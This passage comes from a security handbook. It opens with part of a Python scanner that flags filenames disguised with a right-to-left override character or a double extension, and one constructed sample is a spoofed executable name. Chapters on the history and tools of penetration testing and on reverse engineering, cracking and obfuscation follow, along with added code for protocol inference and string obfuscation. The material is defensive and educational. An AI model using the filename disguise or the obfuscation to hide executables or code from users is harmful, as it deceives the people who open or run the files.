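RLO = "\u202e"


def displayed_name(name: str) -> str:
    """Approximates what a file manager renders: the control character is
    invisible, and everything after an RLO appears reversed."""
    if RLO not in name:
        return "".join(ch for ch in name if ch not in BIDI_CONTROLS)
    head, tail = name.split(RLO, 1)
    tail = "".join(ch for ch in tail if ch not in BIDI_CONTROLS)
    return head + tail[::-1]


def check_filename(name: str) -> list:
    """Returns the reasons a filename deserves a closer look (empty if none)."""
    findings = []
    if any(ch in BIDI_CONTROLS for ch in name):
        findings.append("bidi-override")
    parts = name.lower().split(".")
    ext = parts[-1] if len(parts) > 1 else ""
    if ext in EXECUTABLE_EXTENSIONS:
        findings.append("executable-extension")
        if len(parts) > 2 and parts[-2] in DOCUMENT_EXTENSIONS:
            findings.append("double-extension")
    if "bidi-override" in findings and ext in EXECUTABLE_EXTENSIONS:
        # the real extension is executable but the rendered name ends in a document extension
        shown = displayed_name(name).lower().rsplit(".", 1)
        if len(shown) == 2 and shown[1] in DOCUMENT_EXTENSIONS:
            findings.append("displayed-as-document")
    return findings


def scan(names) -> dict:
    """Maps each suspicious name to its findings; clean names are omitted."""
    return {n: f for n in names if (f := check_filename(n))}


# constructed sample attachment names
SAMPLE_NAMES = [
    "quarterly-report.pdf",
    "photo.jpg.exe",
    "holiday.scr",
    "invoice\u202excod.exe",     # renders as invoiceexe.docx
]

if __name__ == "__main__":
    for name, findings in scan(SAMPLE_NAMES).items():
        print(repr(name), "shown as", repr(displayed_name(name)), "->", findings)
```

Matching on the displayed name as well as the real one matters because a user who sees "invoiceexe.docx" has no visible cue that the real extension is .exe; the check surfaces both forms so the reviewer sees exactly what the recipient would.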

Chapter Seven: Introduction to Penetration Testing

What is a Penetration test?

A penetration test, or sometimes pentest, is a software attack on a computer system that looks for security weaknesses, potentially gaining access to the computer’s features and data. The process typically identifies the target systems and a particular goal—then reviews available information and undertakes various means to attain the goal. A penetration test target may be a white box (which provides background and system information) or black box (which provides only basic or no information except the company name). A penetration test can help determine whether a system is vulnerable to attack, if the defenses were sufficient, and which defenses (if any) the test defeated.

Security issues that the penetration test uncovers should be reported to the system owner. Penetration test reports may also assess potential impacts to the organization and suggest countermeasures to reduce risk.

The goals of penetration tests are:

1. Determine feasibility of a particular set of attack vectors.

2. Identify high-risk vulnerabilities from a combination of lower-risk vulnerabilities exploited in a particular sequence.

3. Identify vulnerabilities that may be difficult or impossible to detect with automated network or application vulnerability scanning software.

4. Assess the magnitude of potential business and operational impacts of successful attacks.

5. Test the ability of network defenders to detect and respond to attacks.

6. Provide evidence to support increased investments in security personnel and technology.

History (Penetration Testing)

By the mid-1960s, growing popularity of time-sharing computer systems that made resources accessible over communications lines created new security concerns. As the scholars Deborah Russell and G. T. Gangemi, Sr. explain, “The 1960s marked the true beginning of the age of computer security.” In June 1965, for example, several of the country’s leading computer security experts held one of the first major conferences on system security—hosted by the government contractor, the System Development Corporation (SDC). During the conference, someone noted that one SDC employee had been able to easily undermine various system safeguards added to SDC’s AN/FSQ-32 time-sharing computer system. In hopes that further system security study would be useful, attendees requested “…studies to be conducted in such areas as breaking security protection in the time-shared system.” In other words, the conference participants initiated one of the first formal requests to use computer penetration as a tool for studying system security.

At the Spring 1967 Joint Computer Conference, many leading computer specialists again met to discuss system security concerns. During this conference, the computer security experts Willis Ware, Harold Petersen, and Rein Turn, all of the RAND Corporation, and Bernard Peters of the National Security Agency (NSA), all used the phrase “penetration” to describe an attack against a computer system. In a paper, Ware referred to the military’s remotely accessible time-sharing systems, warning that “Deliberate attempts to penetrate such computer systems must be anticipated.” His colleagues Petersen and Turn shared the same concerns, observing that on-line communication systems “…are vulnerable to threats to privacy,” including “deliberate penetration.” Bernard Peters of the NSA made the same point, insisting that computer input and output “…could provide large amounts of information to a penetrating program.” During the conference, computer penetration would become formally identified as a major threat to online computer systems.

The threat that computer penetration posed was next outlined in a major report organized by the United States Department of Defense (DoD) in late 1967. Essentially, DoD officials turned to Willis Ware to lead a task force of experts from NSA, CIA, DoD, academia, and industry to formally assess the security of time-sharing computer systems. By relying on many papers presented during the Spring 1967 Joint Computer Conference, the task force largely confirmed the threat to system security that computer penetration posed. Ware’s report was initially classified, but many of the country’s leading computer experts quickly identified the study as the definitive document on computer security. Jeffrey R. Yost of the Charles Babbage Institute has more recently described the Ware report as “…by far the most important and thorough study on technical and operational issues regarding secure computing systems of its time period.” In effect, the Ware report reaffirmed the major threat posed by computer penetration to the new online time-sharing computer systems.

To better understand system weaknesses, the federal government and its contractors soon began organizing teams of penetrators, known as tiger teams, to use computer penetration to test system security. Deborah Russell and G. T. Gangemi, Sr. stated that during the 1970s “…‘tiger teams’ first emerged on the computer scene. Tiger teams were government and industry sponsored teams of crackers who attempted to break down the defenses of computer systems in an effort to uncover, and eventually patch, security holes.”

A leading scholar on the history of computer security, Donald MacKenzie, similarly points out that, “RAND had done some penetration studies (experiments in circumventing computer security controls) of early time-sharing systems on behalf of the government.” Jeffrey R. Yost of the Charles Babbage Institute, in his own work on the history of computer security, also acknowledges that both the RAND Corporation and the SDC had “engaged in some of the first so-called ‘penetration studies’ to try to infiltrate time-sharing systems in order to test their vulnerability.” In virtually all these early studies, tiger teams successfully broke into all targeted computer systems, as the country’s time-sharing systems had poor defenses.

Of early tiger team actions, efforts at the RAND Corporation demonstrated the usefulness of penetration as a tool for assessing system security. At the time, one RAND analyst noted that the tests had “…demonstrated the practicality of system-penetration as a tool for evaluating the effectiveness and adequacy of implemented data security safeguards.” In addition, a number of the RAND analysts insisted that the penetration test exercises all offered several benefits that justified their continued use. As they noted in one paper, “A penetrator seems to develop a diabolical frame of mind in his search for operating system weaknesses and incompleteness, which is difficult to emulate.” For these reasons and others, many analysts at RAND recommended the continued study of penetration techniques for their usefulness in assessing system security.

Perhaps the leading computer penetration expert during these formative years was James P. Anderson, who had worked with the NSA, RAND, and other government agencies to study system security. In early 1971, the U.S. Air Force contracted Anderson’s private company to study the security of its time-sharing system at the Pentagon. In his study, Anderson outlined a number of major factors involved in computer penetration. Anderson described a general attack sequence in steps:

1. Find an exploitable vulnerability.

2. Design an attack around it.

3. Test the attack.

4. Seize a line in use.

5. Enter the attack.

6. Exploit the entry for information recovery.

Multiple Penetration Testing Tools

Nmap is a very versatile tool developed to scan addresses (IPv6 included); this tool allows the user to gather a mass amount of information about the target quickly, including open ports and much, much more. Nmap supports a large number of scanning techniques such as: UDP, TCP connect(), TCP SYN (half open), ftp proxy (bounce attack), ICMP (ping sweep), FIN, ACK sweep, Xmas Tree, SYN sweep, IP Protocol, and Null scan.

Wireshark is a very powerful network troubleshooting and analysis tool. Wireshark provides the ability to view data from a live network, and supports hundreds of protocols and media formats.

Cain and Abel is a revolutionary tool that provides many functions that are able to do various password retrieval jobs, cracking passwords, sniffing networks, and routing/analyzing protocols. This tool is Windows-only, unlike many other tools that exist; this is a pleasant twist to modern penetration testing and forensic tools.

Metasploit is a very powerful network security and analysis tool, used often for penetration attacks; this tool has a clean interface and easily gathers the information that you seek.

Ettercap is a suite for man in the middle attacks on LAN. It features sniffing of live connections, content filtering on the fly and many other interesting tricks. It supports active and passive dissection of many protocols (even ciphered ones) and includes many features for network and host analysis. (Taken from their website)

The Nessus tool provides high-speed data discovery, asset profiling, configuration auditing, and vulnerability analysis of networks.

How to Conduct Penetration Testing?

Penetration testing is not merely the serial execution of automated tools and generation of technical reports, as it is frequently viewed. It should provide a clear and concise direction on how to secure an organization’s information and information systems from real world attacks. One critical factor in the success of penetration testing is its underlying methodology. A systematic and scientific approach should be used to successfully document a test and create reports that are aimed at different levels of management within an organization. It should not be restrictive, so that the tester can fully explore his intuitions.

Generally, penetration testing has three phases: test preparation, test, and test analysis, as shown in the Figure above. All the necessary documents for the test are organized and finalized during the test preparation phase. The testers and the organization meet to decide the scope, objectives, timing, and duration of the test. Issues such as information leakages and downtime are resolved and put into a legal agreement document. Other legal agreements that are deemed necessary are concluded and signed during this phase.

The bulk of the penetration testing process is done during the test phase. A variety of automated tools can be used in this phase. This phase involves the following steps: information gathering, vulnerability analysis, and vulnerability exploits.

The information gathering step requires that the tester scan the physical and logical areas of the test target and identify all pertinent information needed in the vulnerability analysis phase. Depending on the information gathered or provided by the organization, the tester then analyzes the vulnerabilities that exist within the target’s network, host and application. The tester may opt to use the manual method to do this step but automated tools also exist to help the tester. The last step allows the tester to find exploits for the vulnerabilities found in the previous steps. When exploits do not lead to what is intended, for example, root access, then further analysis should be done. This is represented by the loop between the vulnerability analysis and vulnerability exploits phases.

Chapter Eight: Decompiling and Reverse Engineering

What is Reverse Engineering?

Reverse engineering is used for many purposes: as a learning tool; as a way to make new, compatible products that are cheaper than what's currently on the market; for making software interoperate more effectively or to bridge data between different operating systems or databases; and to uncover the undocumented features of commercial products.

What is Software Cracking?

Software cracking is the modification of software to remove or disable features which are considered undesirable by the person cracking the software, usually related to protection methods: copy protection, trial/demo version, serial number, hardware key, date checks, CD check or software annoyances like nag screens and adware. The distribution and use of cracked copies is illegal in almost every developed country.

The reasons and goals for obtaining such information vary widely, from everyday or socially beneficial actions to criminal actions, depending upon the situation. Often no intellectual property rights are breached, such as when a person or business cannot recollect how something was done, or what something does, and needs to reverse engineer it to work it out for themselves. Reverse engineering is also beneficial in crime prevention, where suspected malware is reverse engineered to understand what it does and how to detect and remove it, and to allow computers and devices to work together ("interoperate") and to allow saved files on obsolete systems to be used in newer systems. By contrast, reverse engineering can also be used to "crack" software and media to remove their copy protection, or to create a (possibly improved) copy or even a knockoff; this is usually the goal of a competitor.

Reverse engineering has its origins in the analysis of hardware for commercial or military advantage. However, the reverse engineering process in itself is not concerned with creating a copy or changing the artifact in some way; it is only an analysis in order to deduce design features from products with little or no additional knowledge about the procedures involved in their original production.

Reasons for Reverse Engineering

● Interfacing. Reverse engineering can be used when a system is required to interface to another system and how both systems would negotiate is to be established. Such requirements typically exist for interoperability.

● Military or commercial espionage. Learning about an enemy's or competitor's latest research by stealing or capturing a prototype and dismantling it. It may result in the development of a similar product, or better countermeasures for it.

● Improve documentation shortcomings. Reverse engineering can be done when documentation of a system for its design, production, operation or maintenance has shortcomings and the original designers are not available to improve it. Reverse engineering of software can provide the most current documentation necessary for understanding the most current state of a software system.

● Obsolescence. Integrated circuits often seem to have been designed on obsolete, proprietary systems, which means that when those systems can no longer be maintained (lack of spare parts, inefficiency, etc.), the only way to incorporate the functionality into new technology is to reverse-engineer the existing chip and then re-design it using newer tools, using the understanding gained as a guide. Another obsolescence-originated problem which can be solved by reverse engineering is the need to support (maintenance and supply for continuous operation) existing legacy devices which are no longer supported by their OEM. This problem is particularly critical in military operations.

● Software modernization. Often knowledge is lost over time, which can prevent updates and improvements. Reverse engineering is generally needed in order to understand the 'as is' state of existing or legacy software in order to properly estimate the effort required to migrate system knowledge into a 'to be' state. Much of this may be driven by changing functional, compliance or security requirements.

● Product security analysis. To examine how a product works, what the specifications of its components are, estimate costs and identify potential patent infringement. Acquiring sensitive data by disassembling and analysing the design of a system component. Another intent may be to remove copy protection or circumvent access restrictions.

● Bug fixing. To fix (or sometimes to enhance) legacy software which is no longer supported by its creators (e.g. abandonware).

● Creation of unlicensed/unapproved duplicates. Such duplicates are sometimes called clones in the computing domain.

● Academic/learning purposes. Reverse engineering for learning purposes may be to understand the key issues of an unsuccessful design and subsequently improve the design.

● Competitive technical intelligence. Understand what one's competitor is actually doing, versus what they say they are doing.

Types of Reverse Engineering

Reverse engineering of machines

As computer-aided design (CAD) has become more popular, reverse engineering has become a viable method to create a 3D virtual model of an existing physical part for use in 3D CAD, CAM, CAE or other software. The reverse-engineering process involves measuring an object and then reconstructing it as a 3D model. The physical object can be measured using 3D scanning technologies like CMMs, laser scanners, structured light digitizers, or industrial CT scanning (computed tomography). The measured data alone, usually represented as a point cloud, lacks topological information and is therefore often processed and modeled into a more usable format such as a triangular-faced mesh, a set of NURBS surfaces, or a CAD model.

Reverse engineering is also used by businesses to bring existing physical geometry into digital product development environments, to make a digital 3D record of their own products, or to assess competitors' products. It is used to analyse, for instance, how a product works, what it does, and what components it consists of, to estimate costs, and to identify potential patent infringement, etc.

Value engineering is a related activity also used by businesses. It involves de-constructing and analysing products, but the objective is to find opportunities for cost cutting.

Reverse engineering of software

The term reverse engineering as applied to software means different things to different people, prompting Chikofsky and Cross to write a paper researching the various uses and defining a taxonomy. From their paper, they state, "Reverse engineering is the process of analyzing a subject system to create representations of the system at a higher level of abstraction." It can also be seen as "going backwards through the development cycle". In this model, the output of the implementation phase (in source code form) is reverse-engineered back to the analysis phase, in an inversion of the traditional waterfall model. Another term for this technique is program comprehension.

Other purposes of reverse engineering include security auditing, removal of copy protection ("cracking"), circumvention of access restrictions often present in consumer electronics, customization of embedded systems (such as engine management systems), in-house repairs or retrofits, enabling of additional features on low-cost "crippled" hardware (such as some graphics card chip-sets), or even mere satisfaction of curiosity.

Binary software

This process is sometimes termed Reverse Code Engineering, or RCE. As an example, decompilation of binaries for the Java platform can be accomplished using Jad. One famous case of reverse engineering was the first non-IBM implementation of the PC BIOS, which launched the historic IBM PC compatible industry that has been the overwhelmingly dominant computer hardware platform for many years. Reverse engineering of software is protected in the U.S. by the fair use exception in copyright law. The Samba software, which allows systems that are not running Microsoft Windows to share files with systems that are, is a classic example of software reverse engineering, since the Samba project had to reverse-engineer unpublished information about how Windows file sharing worked, so that non-Windows computers could emulate it. The Wine project does the same thing for the Windows API, and OpenOffice.org is one party doing this for the Microsoft Office file formats. The ReactOS project is even more ambitious in its goals, as it strives to provide binary (ABI and API) compatibility with the current Windows OSes of the NT branch, allowing software and drivers written for Windows to run on a clean-room reverse-engineered GPL free software or open-source counterpart. WindowsSCOPE allows for reverse-engineering the full contents of a Windows system's live memory, including a binary-level, graphical reverse engineering of all running processes.

Another classic, if not well-known, example is that in 1987 Bell Laboratories reverse-engineered the Mac OS System 4.1, originally running on the Apple Macintosh SE, so they could run it on RISC machines of their own.

Binary software techniques

Reverse engineering of software can be accomplished by various methods. The three main groups of software reverse engineering are:

1. Analysis through observation of information exchange, most prevalent in protocol reverse engineering, which involves using bus analyzers and packet sniffers, for example, for accessing a computer bus or computer network connection and revealing the traffic data thereon. Bus or network behavior can then be analyzed to produce a stand-alone implementation that mimics that behavior. This is especially useful for reverse engineering device drivers. Sometimes, reverse engineering on embedded systems is greatly assisted by tools deliberately introduced by the manufacturer, such as JTAG ports or other debugging means. In Microsoft Windows, low-level debuggers such as SoftICE are popular.

2. Disassembly using a disassembler, meaning the raw machine language of the program is read and understood in its own terms, only with the aid of machine-language mnemonics. This works on any computer program but can take quite some time, especially for someone not used to machine code. The Interactive Disassembler is a particularly popular tool.

Reverse engineering of protocols

Protocols are sets of rules that describe message formats and how messages are exchanged (i.e., the protocol state-machine). Accordingly, the problem of protocol reverse-engineering can be partitioned into two subproblems: message format and state-machine reverse-engineering.

The message formats have traditionally been reverse-engineered through a tedious manual process, which involved analysis of how protocol implementations process messages, but recent research has proposed a number of automatic solutions. Typically, these automatic approaches either group observed messages into clusters using various clustering analyses, or emulate the protocol implementation, tracing the message processing.

There has been less work on reverse-engineering of state-machines of protocols. In general, the protocol state-machines can be learned either through a process of offline learning, which passively observes communication and attempts to build the most general state-machine accepting all observed sequences of messages, or online learning, which allows interactive generation of probing sequences of messages and listening to responses to those probing sequences. In general, offline learning of small state-machines is known to be NP-complete, while online learning can be done in polynomial time. An automatic offline approach has been demonstrated by Comparetti et al. and an online approach very recently by Cho et al.
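As an added example (not from the book or from the papers it cites), here is a small Python illustration of both subproblems on constructed traffic: message-format inference by clustering observed messages on their first byte and marking which positions are fixed, and offline state-machine learning via a prefix-tree acceptor built from the observed message sequences. The protocol, the captured sessions and the function names are assumptions made for this example.

```python
from collections import defaultdict

# Constructed captures of a hypothetical binary protocol (not a real one):
# byte 0 = message type, bytes 1-2 = big-endian payload length, then payload.
# Three recorded sessions; each is the ordered list of messages observed.
SESSIONS = [
    [b"\x01\x00\x04user", b"\x02\x00\x01\x00", b"\x03\x00\x03abc", b"\x04\x00\x00"],
    [b"\x01\x00\x05admin", b"\x02\x00\x01\x01", b"\x04\x00\x00"],
    [b"\x01\x00\x04root", b"\x02\x00\x01\x00", b"\x03\x00\x02xy",
     b"\x03\x00\x01z", b"\x04\x00\x00"],
]


def infer_formats(sessions):
    """Message-format step: cluster messages by their first byte (the
    suspected type field) and, per cluster, record which byte positions hold
    the same value in every observed message. Constant positions are likely
    fixed fields; varying ones are length or payload."""
    clusters = defaultdict(list)
    for session in sessions:
        for msg in session:
            clusters[msg[0]].append(msg)
    formats = {}
    for mtype, msgs in clusters.items():
        width = min(len(m) for m in msgs)
        fixed = [pos for pos in range(width)
                 if len({m[pos] for m in msgs}) == 1]
        formats[mtype] = {"count": len(msgs), "min_len": width, "fixed": fixed}
    return formats


def build_pta(sessions):
    """State-machine step (offline learning): build the prefix-tree acceptor
    whose paths are exactly the observed message-type sequences. State 0 is
    the start; transitions[(state, msg_type)] -> next state. The PTA is the
    most specific acceptor; generalising it means merging equivalent states."""
    transitions, accepting, fresh = {}, set(), 1
    for session in sessions:
        state = 0
        for msg in session:
            key = (state, msg[0])
            if key not in transitions:
                transitions[key] = fresh
                fresh += 1
            state = transitions[key]
        accepting.add(state)  # a session ended in this state
    return transitions, accepting


def accepts(transitions, accepting, type_sequence):
    """True if every step of the sequence has a learned transition and the
    sequence ends in a state where an observed session ended."""
    state = 0
    for mtype in type_sequence:
        if (state, mtype) not in transitions:
            return False
        state = transitions[(state, mtype)]
    return state in accepting


if __name__ == "__main__":
    for mtype, info in sorted(infer_formats(SESSIONS).items()):
        print(f"type 0x{mtype:02x}: {info}")
    trans, acc = build_pta(SESSIONS)
    print("1,2,4 accepted:", accepts(trans, acc, [1, 2, 4]))
    print("1,4 accepted:", accepts(trans, acc, [1, 4]))
```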

Other components of typical protocols, like encryption and hash functions, can be reverse-engineered automatically as well. Typically, the automatic approaches trace the execution of protocol implementations and try to detect buffers in memory holding unencrypted packets.

Reverse engineering of integrated circuits/smart cards

Reverse engineering is an invasive and destructive form of analyzing a smart card. The attacker grinds away layer after layer of the smart card and takes pictures with an electron microscope. With this technique, it is possible to reveal the complete hardware and software part of the smart card. The major problem for the attacker is to bring everything into the right order to find out how everything works. The makers of the card try to hide keys and operations by mixing up memory positions, for example, bus scrambling. In some cases, it is even possible to attach a probe to measure voltages while the smart card is still operational. The makers of the card employ sensors to detect and prevent this attack. This attack is not very common because it requires a large investment in effort and special equipment that is generally only available to large chip manufacturers. Furthermore, the payoff from this attack is low since other security techniques are often employed, such as shadow accounts.

Note: In this chapter I will only be discussing reverse engineering of software. But if you're interested in learning all these methods then email me, I'll personally help you with it.

Software Obfuscation

In software development, obfuscation is the deliberate act of creating obfuscated code, i.e. source or machine code that is difficult for humans to understand. Like obfuscation in natural language, it may use needlessly roundabout expressions to compose statements.

Programmers may deliberately obfuscate code to conceal its purpose (security through obscurity) or its logic, in order to prevent tampering, deter reverse engineering, or as a puzzle or recreational challenge for someone reading the source code.

Programs known as obfuscators transform readable code into obfuscated code using various techniques.

Obfuscating software

A variety of tools exist to perform or assist with code obfuscation. These include experimental research tools created by academics, hobbyist tools, commercial products written by professionals, and open-source software. There also exist deobfuscation tools that attempt to perform the reverse transformation.

Although the majority of commercial obfuscation solutions work by transforming either program source code, or platform-independent bytecode as used by Java and .NET, there are also some that work with C and C++, languages that are typically compiled to native code, or work directly on compiled binaries.
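As an added example that is not part of the book, the following Python obfuscator shows what an obfuscator does and what a deobfuscation tool undoes: using the standard-library ast module it renames every user-defined identifier and hides each string literal behind a runtime decode, the transformed program still behaves identically, and a few lines of deobfuscation pull the hidden strings straight back out. The sample program and the names obfuscate, run_function and recover_strings are assumptions made for this example.

```python
import ast
import base64
import re

# Constructed sample program (not from the book): a readable licence check.
READABLE_SOURCE = '''
def check_licence(serial, expected):
    message = "invalid"
    if serial == expected:
        message = "valid"
    return message
'''

class Renamer(ast.NodeTransformer):
    """Rename user-defined functions, parameters and locals to v0, v1, ...
    and replace string literals with a runtime base64 decode."""
    def __init__(self):
        self.names = {}  # original name -> obfuscated name

    def _alias(self, name):
        return self.names.setdefault(name, f"v{len(self.names)}")

    def visit_FunctionDef(self, node):
        node.name = self._alias(node.name)
        for arg in node.args.args:
            arg.arg = self._alias(arg.arg)
        self.generic_visit(node)
        return node

    def visit_Name(self, node):
        # Only rename names we defined; builtins such as len() stay readable.
        if node.id in self.names or isinstance(node.ctx, ast.Store):
            node.id = self._alias(node.id)
        return node

    def visit_Constant(self, node):
        if isinstance(node.value, str):  # hide the literal behind a decode call
            enc = base64.b64encode(node.value.encode()).decode()
            return ast.parse(f'__import__("base64").b64decode("{enc}").decode()',
                             mode="eval").body
        return node

def obfuscate(source):
    """Return (obfuscated source, mapping of original -> obfuscated names)."""
    renamer = Renamer()
    tree = ast.fix_missing_locations(renamer.visit(ast.parse(source)))
    return ast.unparse(tree), dict(renamer.names)

def run_function(source, name, *args):
    """Execute generated source in a fresh namespace and call one function."""
    namespace = {}
    exec(source, namespace)
    return namespace[name](*args)

def recover_strings(obfuscated):
    """Deobfuscation: the hidden literals decode straight back out, so this
    slows a reverse engineer down without stopping one."""
    return [base64.b64decode(m).decode()
            for m in re.findall(r"b64decode\('([^']+)'\)", obfuscated)]
```

Requires Python 3.9 or later for ast.unparse.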

Disadvantages of obfuscation

Obfuscation can make reading, writing and reverse-engineering a program difficult and time-consuming, but not necessarily impossible. Some anti-virus software, such as AVG, will also alert their users when they land on a site with obfuscated code, as one of the purposes of obfuscation can be to hide malicious code. However, some developers may employ code obfuscation for the purpose of reducing file size or increasing security. The average user may not expect their antivirus software to provide alerts about an otherwise harmless piece of code, especially from trusted corporations, so such a feature may actually serve as a deterrent.

There has been debate on whether it is illegal to skirt copyleft software licenses by releasing source code in obfuscated form, such as in cases in which the author is less willing to make the source code available. The issue is addressed in the GNU General Public License by requiring that the "preferred" version of the source code be made available. The GNU website states "Obfuscated 'source code' is not real source code and does not count as source code."

What are .NET Decompilers?

What is a reflector [.NET]:

"The .NET Reflector was the first .NET assembly browser; it can be used to inspect, navigate, search, analyze, and browse the contents of a .NET component such as an assembly and translates the binary information to a human-readable form. By default Reflector allows decompilation of .NET assemblies into C#, Visual Basic .NET, Common Intermediate Language and F# (alpha version). Reflector also includes a "Call Tree" that can be used to drill down into IL methods to see what other methods they call. It will show the metadata, resources and XML documentation. .NET Reflector can be used by .NET developers to understand the inner workings of code libraries, to show the differences between two versions of the same assembly, and how the various parts of a .NET application interact with each other. There are a large number of add-ons for Reflector." - Wikipedia (.NET Reflector)

How can I use one for hacking or decompiling?

Reflectors [such as the official one below, yep it's shareware] are awesome for decompiling software. These days, almost every Windows app (psst: Windows 8 as well) is using the .NET framework to power their app. With a reflector, you can 'drill' into and explore the code powering applications.

Open Source Reflector [FREE]: http://wiki.sharpdevelop.net/ILSpy.ashx

The OFFICIAL .NET Reflector [$35 but WORTH IT]: http://www.reflector.net

Some tools for Reverse Engineering

Assembly Inspectors

ILSpy - a new .NET assembly inspector

● Assembly browsing
● IL disassembly
● Decompilation to C#
● Saving of resources
● Search for types/methods/properties (substring)
● Hyperlink-based type/method/property navigation
● Base/derived types navigation
● And many more!

.NET Reflector - browse, analyze, decompile and debug .NET code

● Debug assemblies without source code using the Visual Studio debugger
● Decompile and explore .NET assemblies inside Visual Studio
● Serve as a powerful object browser
● Decompile .NET code to understand how it works
● Learn or teach the complexities of a .NET language
● Provide a better alternative to library documentation
● And many more!

Debuggers

OllyDBG v1.10 - an assembly level analysing debugger

● Directly loads and debugs DLLs
● Object file scanning - locates routines from object files and libraries
● Allows for user-defined labels, comments and function descriptions
● Understands debugging information in Borland® format
● Saves patches between sessions, writes them back to the executable file and updates fixups
● Open architecture - many third-party plugins are available
● And many more!

Immunity Debugger - Knowing You're Secure

● A debugger with functionality designed specifically for the security industry
● Cuts exploit development time by 50%
● Simple, understandable interfaces
● Robust and powerful scripting language for automating intelligent debugging

IDA - the world's smartest and most feature-rich disassembler

● Multi-hosted application
● Multi-processor disassembler
● Fully programmable environment
● Complete plugin programming
● Local and remote debugger
● Hostile code analyzer
● COTS validation

Memory Editors

MHS - an average memory editor

● Data type search
● String search
● Pointer search
● Group search
● Sub search
● Script search
● RAM watcher
● Executable breakpoints
● Conditional breakpoints